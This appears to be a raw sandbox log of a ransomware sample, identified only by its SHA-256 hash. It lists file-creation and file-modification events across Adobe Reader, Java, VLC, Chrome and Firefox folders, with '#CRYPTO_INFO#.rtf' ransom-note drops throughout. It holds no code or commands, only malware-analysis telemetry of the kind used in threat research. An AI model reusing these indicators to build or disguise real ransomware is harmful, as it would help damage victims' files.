8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\tr-tr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\br\LC_MESSAGES\vlc.mo 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_sortedby_18.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\de-de\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\sk-sk\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\selector.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\tr-tr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.transport.ecf.nl_ja_4.4.0.v20140623020002.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-application-views_ja.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\da-dk\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\circle_2x.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\illustrations.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\modules\locale\org-netbeans-lib-profiler-charts_zh_CN.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\bin\idlj.exe 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\nb-no\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\hi.pak 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\epl-v10.html 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win-scrollbar\themes\dark\vscroll-thumb.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\zh-cn\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\css\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\root\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Windows Mail\en-US\WinMail.exe.mui 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\ExitFormat.crw 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\security\java.security 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\ended_review_or_form.gif 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\organize.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_listview_selected.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-netbeans-swing-tabcontrol.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\ext\zipfs.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\META-INF\ECLIPSE_.RSA 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\zh-tw\AppStore_icon.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\plugins\selection-action-plugins\epdf\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\uk-ua\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\nls\pt-br\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\db\bin\setNetworkServerCP.bat 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\cue.luac 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_ellipses.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\css\main-selector.css 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\Font\MyriadPro-It.otf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\core_icons.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\p2\org.eclipse.equinox.p2.core\cache\binary\org.eclipse.rcp_root_4.4.0.v20141007-2301 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\cs-cz\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\themes\dark\SearchEmail.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\vi_get.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\tr_get.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\ko-kr\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\fr-fr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.ui_5.5.0.165303.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\ext\cldrdata.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Google\Update\DisabledGoogleUpdate.exe 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\js\plugins\rhp\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\fr-ma\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\db\lib\derbyLocale_ja_JP.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\fr-ma\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\selector.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\CompleteCheckmark2x.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.jetty.http_8.1.14.v20131031.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\META-INF\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\fr-ma\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-uihandler_ja.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\themes\dark\logo_retina.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\js\nls\fr-fr\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.model.workbench.nl_zh_4.4.0.v20140623020002.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\jre\lib\amd64\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\images\cursors\win32_CopyNoDrop32x32.gif 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\scanAppLogo.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\en-gb\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\en-gb\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\acrobat_pdf.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\pt-br\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\it-it\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\sv-se\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\nl-nl\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\ca-es\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\images\themes\dark\rhp_world_icon_hover_2x.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\pt-br\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\am\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\hu-hu\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\it-it\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\bun.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_filterselected-focus_32.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-openide-text_zh_CN.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\A12_Spinner_int_2x.gif 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\sk-sk\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\sq\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\pt-br\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\it-it\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\@1x\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\chrome.dll.sig 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\reduced_mode.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\uk-ua\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\com.jrockit.mc.rjmx.metadataprovider.exsd 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\configuration\org.eclipse.equinox.simpleconfigurator\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\en-ae\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\eu-es\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\eu-es\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\hr.pak 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\pl-pl\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Click on 'Change' to select default PDF handler.pdf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\plugins\plugins.dat 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-netbeans-swing-plaf.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\nb-no\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\master_preferences 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\sl-si\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\bs\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-host-views_zh_CN.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\intf\modules\httprequests.luac 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.update.configurator_3.3.300.v20140518-1928.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Mozilla Firefox\plugin-container.exe 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\css\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Google\Update\Install\{1DD96F7A-AD33-4336-A298-2296283FF9BE}\84.0.4147.89_chrome_installer.exe 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\root\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_filter-hover_32.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\es-es\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\@1x\[email protected] 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\zh-tw\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\sl-si\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\sl-si\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Mozilla Firefox\gmp-clearkey\0.1\clearkey.dll.sig 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\com.jrockit.mc.feature.core_5.5.0.165303\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\zh-tw\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_listview-hover.svg 